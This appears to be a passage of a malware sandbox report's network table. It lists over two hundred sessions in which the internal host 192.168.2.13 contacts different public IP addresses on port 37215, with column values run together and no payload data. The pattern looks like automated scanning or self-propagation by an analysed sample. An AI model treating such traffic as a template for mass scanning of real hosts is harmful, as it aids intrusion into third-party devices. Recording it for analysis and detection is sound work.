                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12014192.168.2.1332920157.208.220.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12015192.168.2.1338310157.183.29.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12016192.168.2.1339422197.184.81.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12017192.168.2.1360792157.83.33.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12018192.168.2.1343226197.30.221.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12019192.168.2.1335806197.165.57.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12020192.168.2.135038641.184.18.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12021192.168.2.1348062157.64.36.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12022192.168.2.1346016197.116.186.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12023192.168.2.1339560157.154.154.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12024192.168.2.1358916157.79.87.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12025192.168.2.133585841.176.36.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12026192.168.2.133303024.203.68.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12027192.168.2.1339668157.196.75.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12028192.168.2.135049641.110.115.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12029192.168.2.1351396197.75.162.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12030192.168.2.133575241.111.117.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12031192.168.2.135726241.189.17.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12032192.168.2.1334698157.182.8.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12033192.168.2.1357254197.15.11.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12034192.168.2.1334736200.178.24.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12035192.168.2.1356272197.215.69.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12036192.168.2.1343274157.81.44.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12037192.168.2.1334450197.121.212.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12038192.168.2.1344344197.83.210.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12039192.168.2.134175293.67.246.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12040192.168.2.135538641.199.116.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12041192.168.2.1354956157.118.163.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12042192.168.2.1359856197.3.244.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12043192.168.2.1354806197.200.76.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12044192.168.2.1359780157.46.227.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12045192.168.2.133758641.88.23.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12046192.168.2.1341294181.155.165.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12047192.168.2.133365435.249.70.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12048192.168.2.133671441.202.184.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12049192.168.2.1356972111.86.237.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12050192.168.2.134023441.86.0.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12051192.168.2.1358056157.29.241.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12052192.168.2.1340494197.224.12.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12053192.168.2.1337102117.175.86.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12054192.168.2.1351534197.115.55.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12055192.168.2.135080841.169.116.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12056192.168.2.134473241.56.54.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12057192.168.2.134448892.245.224.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12058192.168.2.1352842173.233.60.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12059192.168.2.135488241.222.94.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12060192.168.2.134445441.15.234.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12061192.168.2.1354596197.91.81.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12062192.168.2.1348172157.175.252.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12063192.168.2.1342192197.13.239.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12064192.168.2.1345702197.158.167.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12065192.168.2.1345610157.118.202.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12066192.168.2.1343356173.70.3.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12067192.168.2.133686642.122.245.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12068192.168.2.1345438160.132.184.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12069192.168.2.1358414161.29.210.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12070192.168.2.1346774157.178.35.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12071192.168.2.1349038157.52.174.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12072192.168.2.1339936197.168.144.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12073192.168.2.135428641.200.72.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12074192.168.2.133699241.125.223.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12075192.168.2.1350962157.90.72.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12076192.168.2.1343328197.250.158.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12077192.168.2.1358642197.152.188.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12078192.168.2.1345118157.145.28.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12079192.168.2.1352590157.150.242.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12080192.168.2.1333336157.10.68.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12081192.168.2.134921041.146.48.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12082192.168.2.1339906157.225.42.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12083192.168.2.134188241.72.65.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12084192.168.2.1356472197.45.108.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12085192.168.2.1351152197.204.147.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12086192.168.2.135011041.101.157.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12087192.168.2.1334198140.146.28.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12088192.168.2.133480441.109.202.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12089192.168.2.1354490178.14.123.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12090192.168.2.1335816197.7.127.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12091192.168.2.1354730197.161.91.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12092192.168.2.135936641.236.35.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12093192.168.2.1339916197.208.184.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12094192.168.2.135791241.143.18.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12095192.168.2.1348354157.101.70.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12096192.168.2.1345308197.35.54.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12097192.168.2.1334958157.51.134.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12098192.168.2.1357490197.25.216.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12099192.168.2.134193641.173.90.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12100192.168.2.1344302157.154.140.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12101192.168.2.1338042197.175.117.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12102192.168.2.1337214157.70.208.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12103192.168.2.135733094.19.187.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12104192.168.2.1337908197.138.31.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12105192.168.2.1342252157.34.46.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12106192.168.2.1349366157.65.154.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12107192.168.2.1348390157.244.119.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12108192.168.2.135945441.72.182.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12109192.168.2.1344834194.76.11.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12110192.168.2.1341318157.64.219.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12111192.168.2.135071241.131.132.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12112192.168.2.135212641.39.166.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12113192.168.2.134051441.27.103.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12114192.168.2.1344938197.90.200.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12115192.168.2.133540841.116.29.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12116192.168.2.133326241.86.111.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12117192.168.2.1354566197.65.101.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12118192.168.2.13546289.28.94.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12119192.168.2.1360464157.38.88.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12120192.168.2.134262076.6.25.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12121192.168.2.1347464157.112.170.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12122192.168.2.135564641.37.8.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12123192.168.2.134802041.236.194.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12124192.168.2.1347498157.196.144.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12125192.168.2.1354688209.79.189.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12126192.168.2.135876241.248.91.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12127192.168.2.134505441.160.77.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12128192.168.2.133950089.92.17.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12129192.168.2.1350468157.20.0.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12130192.168.2.134823241.22.112.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12131192.168.2.133703041.94.133.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12132192.168.2.133500641.123.77.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12133192.168.2.1341622210.106.161.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12134192.168.2.1340796152.17.202.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12135192.168.2.1351044147.206.182.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12136192.168.2.1347118157.223.129.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12137192.168.2.1340518157.139.49.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12138192.168.2.1341400157.218.166.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12139192.168.2.1351362157.78.18.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12140192.168.2.1351974197.220.111.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12141192.168.2.1334082197.30.170.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12142192.168.2.1347580157.11.146.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12143192.168.2.1354370157.85.224.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12144192.168.2.1349992179.205.101.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12145192.168.2.1348028197.197.202.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12146192.168.2.1350028157.220.12.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12147192.168.2.135661641.178.79.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12148192.168.2.135881041.177.101.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12149192.168.2.1353544157.141.243.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12150192.168.2.1338138146.222.63.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12151192.168.2.134757041.132.224.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12152192.168.2.133473441.164.152.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12153192.168.2.1334738110.229.45.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12154192.168.2.1357846157.80.154.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12155192.168.2.1341338197.185.165.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12156192.168.2.1352962197.70.53.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12157192.168.2.1335062197.7.87.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12158192.168.2.135219641.0.203.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12159192.168.2.135871041.211.235.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12160192.168.2.1336718197.34.20.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12161192.168.2.1358860197.46.194.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12162192.168.2.1334394169.118.211.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12163192.168.2.1354566197.73.138.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12164192.168.2.1333862197.64.226.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12165192.168.2.135812652.167.234.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12166192.168.2.135990698.104.114.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12167192.168.2.134031841.121.225.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12168192.168.2.135483241.29.132.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12169192.168.2.1345582197.126.255.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12170192.168.2.135702641.58.21.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12171192.168.2.1333212157.248.26.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12172192.168.2.134555641.81.206.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12173192.168.2.1356298197.68.104.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12174192.168.2.134354441.33.146.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12175192.168.2.1352936157.25.244.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12176192.168.2.1351664157.205.210.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12177192.168.2.1351980197.2.204.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12178192.168.2.1337468189.13.46.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12179192.168.2.1337928168.104.90.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12180192.168.2.1335390209.146.150.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12181192.168.2.1353086125.25.40.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12182192.168.2.135733641.230.222.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12183192.168.2.134111254.119.249.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12184192.168.2.133948041.43.190.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12185192.168.2.1339190157.121.142.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12186192.168.2.1353958193.164.163.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12187192.168.2.1332956135.240.144.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12188192.168.2.1336360197.165.247.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12189192.168.2.134256441.196.51.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12190192.168.2.135085441.244.155.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12191192.168.2.1360004157.19.137.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192192.168.2.1352956157.6.244.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12193192.168.2.1345668197.120.255.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12194192.168.2.1341454133.61.200.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12195192.168.2.1343370197.148.7.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12196192.168.2.135939441.226.31.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12197192.168.2.1340526121.129.91.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12198192.168.2.1342340197.40.24.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12199192.168.2.1352914197.201.19.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12200192.168.2.1347180193.174.238.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12201192.168.2.1341302197.155.161.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12202192.168.2.134140041.9.205.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12203192.168.2.1346068197.118.104.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12204192.168.2.1346296157.17.149.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12205192.168.2.1336778197.58.17.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12206192.168.2.1341888157.130.190.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12207192.168.2.1333730209.255.115.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12208192.168.2.135073041.107.212.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12209192.168.2.1347482157.193.165.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12210192.168.2.1356890197.138.173.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12211192.168.2.1360956157.242.213.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12212192.168.2.1357190157.134.127.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12213192.168.2.1336110113.60.58.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12214192.168.2.133982041.92.156.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12215192.168.2.133712241.97.8.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12216192.168.2.1341248196.139.115.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12217192.168.2.1335618157.162.247.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12218192.168.2.134808841.117.0.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12219192.168.2.1349758157.229.39.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12220192.168.2.134398841.253.189.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12221192.168.2.1360816106.117.44.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12222192.168.2.1353854195.249.102.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
